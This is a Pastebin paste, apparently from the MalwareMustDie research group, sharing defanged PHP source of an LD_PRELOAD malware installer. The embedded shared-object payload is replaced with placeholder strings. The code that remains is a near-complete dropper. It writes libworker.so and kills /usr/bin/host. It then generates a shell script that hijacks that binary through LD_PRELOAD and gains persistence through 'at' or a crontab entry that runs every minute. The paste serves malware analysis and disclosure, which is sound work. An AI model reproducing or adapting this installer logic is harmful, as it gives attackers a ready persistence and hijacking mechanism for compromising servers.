API tools faq
paste
MalwareMustDie

jinxed source1 of .SO ELF LD_PRELOAD PHP malware installer

MalwareMustDie
Jun 10th, 2014 (edited)
847
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.89 KB | None | 0 0
raw download clone embed print report
  1. // Sample jinxed source code of the .SO ELD LD_PRELOAD PHP malware installer
  2. // MalwareMustDie
  3.  
  4. <?php
  5.  
  6. header("Content-type: text/plain");
  7. print "2842123700\n";
  8.  
  9. if (! function_exists('file_put_contents')) {
  10.     function file_put_contents($filename, $data) {
  11.         $f = @fopen($filename, 'w');
  12.         if (! $f)
  13.             return false;
  14.         $bytes = fwrite($f, $data);
  15.         fclose($f);
  16.         return $bytes;
  17.     }
  18. }
  19.  
  20. @system("killall -9 ".basename("/usr/bin/host"));
  21.  
  22. $so32 = "xxxxxxxxxx";
  23. $so64 = "xxxxxxxxxx";
  24. $arch = 64;
  25. if (intval("9223372036854775807") == 2147483647)
  26.     $arch = 32;
  27. print "Arch is ".$arch."\n";
  28. $so = $arch == 32 ? $so32 : $so64;
  29. $f = fopen("/usr/bin/host", "rb");
  30. if ($f) {
  31.     $n = unpack("C*", fread($f, 8));
  32.     $so[7] = sprintf("%c", $n[8]);
  33.     print "System is ".($n[8] == 9 ? "FreeBSD" : "Linux")."\n";
  34.     fclose($f);
  35. }
  36. print "SO dumped ".file_put_contents("./libworker.so", $so)."\n";
  37. if (getenv("MAYHEM_DEBUG"))
  38.     exit(0);
  39. $AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  40. /* second stage dropper */
  41. $HBN=basename("/usr/bin/host");
  42. $SCP=getcwd();
  43. $SCR  ="#!/bin/sh\ncd '".$SCP."'\nif [ -f './libworker.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./libworker.so\n/usr/bin/host\nunset LD_PRELOAD\n";
  44. $SCR .="crontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n";
  45. @file_put_contents("1.sh", $SCR);
  46. @chmod("1.sh", 0777);
  47. /* try at now, file will be removed, crontab cleaned on success */
  48. @system("at now -f 1.sh", $ret);
  49. if ($ret == 0) {
  50.     for ($i = 0; $i < 5; $i++) {
  51.         if (! @file_exists("1.sh")) {
  52.             print "AT success\n";
  53.             exit(0);
  54.         }
  55.         sleep(1);
  56.     }
  57. }
  58. @system("(crontab -l|grep -v crontab;echo;echo '* * * * * ".$SCP."/1.sh')|crontab", $ret);
  59. if ($ret == 0) {
  60.     for ($i = 0; $i < 62; $i++) {
  61.         if (! @file_exists("1.sh")) {
  62.             print "CRONTAB success\n";
  63.             exit(0);
  64.         }
  65.         sleep(1);
  66.     }
  67. }
  68. print "Running straight\n";
  69. @system("./1.sh");
  70.  
  71. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!